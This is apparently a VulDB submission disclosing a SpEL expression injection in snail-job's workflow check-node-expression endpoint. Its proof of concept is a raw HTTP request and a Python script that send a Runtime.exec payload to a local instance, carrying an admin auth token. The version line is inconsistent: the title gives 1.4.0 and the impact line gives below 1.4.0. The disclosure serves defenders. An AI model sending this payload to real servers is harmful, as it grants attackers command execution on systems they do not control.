| Title | gitee/github snail-job 1.4.0 Command Injection |
|---|
| Description | ## summary
This vulnerability is a SpEL (Spring Expression Language) expression injection. Authenticated users can exploit this flaw by inserting malicious SpEL expressions into the ​condition expression field when creating decision nodes in the ​Workflow-Task Management module. When the system validates the condition expression, the SpEL engine executes the embedded code, leading to remote command execution.
## Poc
```
POST /snail-job/workflow/check-node-expression HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 129
X-Request-Id: Zjn6GKOLVAYMyyFyIdwpH
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99"
timeout: 6000
sec-ch-ua-mobile: ?0
SNAIL-JOB-AUTH: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NDE4MzM5NzMsImF1ZCI6IntcImlkXCI6MSxcInVzZXJuYW1lXCI6XCJhZG1pblwiLFwicm9sZVwiOjIsXCJjcmVhdGVEdFwiOlwiMjAyNS0wMy0xMiAxMDo0MDo0N1wiLFwidXBkYXRlRHRcIjpcIjIwMjUtMDMtMTIgMTA6NDA6NDdcIn0ifQ.vx9EcFK-R150Z6fr2uEI6awuyUAoHGRdT7ip4lxBf1o
SNAIL-JOB-NAMESPACE-ID: 764d604ec6fc45f68cd92514c40e9e1a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Origin: http://127.0.0.1:8888
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8888/snail-job/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{"expressionType":3,"logicalCondition":1,"defaultDecision":0,"nodeExpression":"T(java.lang.Runtime).getRuntime().exec(\"calc\")"}
```
Python Code
```
import requests
url = "http://127.0.0.1:8888/snail-job/workflow/check-node-expression"
headers = {
"Host": "127.0.0.1:8888",
"X-Request-Id": "Zjn6GKOLVAYMyyFyIdwpH",
"sec-ch-ua-platform": "\"Windows\"",
"Accept-Language": "zh-CN,zh;q=0.9",
"sec-ch-ua": "\"Chromium\";v=\"133\", \"Not(A:Brand\";v=\"99\"",
"timeout": "6000",
"sec-ch-ua-mobile": "?0",
"SNAIL-JOB-AUTH": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NDE4MzM5NzMsImF1ZCI6IntcImlkXCI6MSxcInVzZXJuYW1lXCI6XCJhZG1pblwiLFwicm9sZVwiOjIsXCJjcmVhdGVEdFwiOlwiMjAyNS0wMy0xMiAxMDo0MDo0N1wiLFwidXBkYXRlRHRcIjpcIjIwMjUtMDMtMTIgMTA6NDA6NDdcIn0ifQ.vx9EcFK-R150Z6fr2uEI6awuyUAoHGRdT7ip4lxBf1o",
"SNAIL-JOB-NAMESPACE-ID": "764d604ec6fc45f68cd92514c40e9e1a",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36",
"Accept": "application/json, text/plain, */*",
"Content-Type": "application/json",
"Origin": "http://127.0.0.1:8888",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Dest": "empty",
"Referer": "http://127.0.0.1:8888/snail-job/",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive"
}
data = {
"expressionType": 3,
"logicalCondition": 1,
"defaultDecision": 0,
"nodeExpression": "T(java.lang.Runtime).getRuntime().exec(\"calc\")"
}
response = requests.post(url, headers=headers, json=data)
print("Status Code:", response.status_code)
print("Response Body:", response.text)
```
##Impact
snail-job version <1.4.0 |
|---|
| Source | ⚠️ https://gitee.com/aizuda/snail-job/issues/IBSQ24 |
|---|
| User | startr4ck (UID 76213) |
|---|
| Submission | 03/12/2025 05:27 (1 Year ago) |
|---|
| Moderation | 03/21/2025 21:31 (10 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 300624 [aizuda snail-job 1.4.0 Workflow-Task Management check-node-expression getRuntime nodeExpression deserialization] |
|---|
| Points | 20 |
|---|